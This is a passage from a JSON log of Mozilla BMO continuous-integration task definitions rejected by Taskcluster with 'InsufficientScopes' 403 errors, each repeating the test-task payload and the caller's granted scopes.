\\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"San\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"sanity\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"b205285d4b5904a59d53107ec8c423eb1890725d\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"description\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-29T20:07:25.156Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-30T20:07:25.156Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"d8kWcqh7RUWXCSxXeYAuNA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-30T20:07:25.156Z\\\"\\n}\\n  time:     2016-09-29T20:07:25.283Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"PP3uIWSjS8eYTKq2PSVsMQ\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"San\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"sanity\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 8,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-bteam\",\n                            \"GITHUB_BASE_SHA\": \"639a051e3aea3608efd7607b944b2c33aa17cfe5\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"mozilla-bteam\",\n                            \"GITHUB_HEAD_SHA\": \"b205285d4b5904a59d53107ec8c423eb1890725d\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"mozilla-bteam@noreply.github.com\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Basic Sanity Tests\",\n                        \"description\": \"Basic Sanity Tests\",\n                        \"owner\": \"mozilla-bteam@noreply.github.com\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-29T20:07:25.156Z\",\n                    \"deadline\": \"2016-09-30T20:07:25.156Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"d8kWcqh7RUWXCSxXeYAuNA\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-30T20:07:25.156Z\"\n                },\n                \"time\": \"2016-09-29T20:07:25.283Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"fvgnnI8vQt2hch0fk03XMQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"API\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"webservices\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"b205285d4b5904a59d53107ec8c423eb1890725d\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"WebService API Tests\\\",\\n    \\\"description\\\": \\\"WebService API Tests\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-29T20:07:25.157Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-30T20:07:25.158Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"d8kWcqh7RUWXCSxXeYAuNA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-30T20:07:25.158Z\\\"\\n}\\n  time:     2016-09-29T20:07:25.292Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"fvgnnI8vQt2hch0fk03XMQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"API\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"webservices\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"b205285d4b5904a59d53107ec8c423eb1890725d\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"WebService API Tests\\\",\\n    \\\"description\\\": \\\"WebService API Tests\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-29T20:07:25.157Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-30T20:07:25.158Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"d8kWcqh7RUWXCSxXeYAuNA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-30T20:07:25.158Z\\\"\\n}\\n  time:     2016-09-29T20:07:25.292Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"fvgnnI8vQt2hch0fk03XMQ\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"API\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"webservices\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 8,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-bteam\",\n                            \"GITHUB_BASE_SHA\": \"639a051e3aea3608efd7607b944b2c33aa17cfe5\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"mozilla-bteam\",\n                            \"GITHUB_HEAD_SHA\": \"b205285d4b5904a59d53107ec8c423eb1890725d\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"mozilla-bteam@noreply.github.com\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            },\n                            \"public/httpd_error_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/httpd/error_log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"WebService API Tests\",\n                        \"description\": \"WebService API Tests\",\n                        \"owner\": \"mozilla-bteam@noreply.github.com\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-29T20:07:25.157Z\",\n                    \"deadline\": \"2016-09-30T20:07:25.158Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"d8kWcqh7RUWXCSxXeYAuNA\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-30T20:07:25.158Z\"\n                },\n                \"time\": \"2016-09-29T20:07:25.292Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  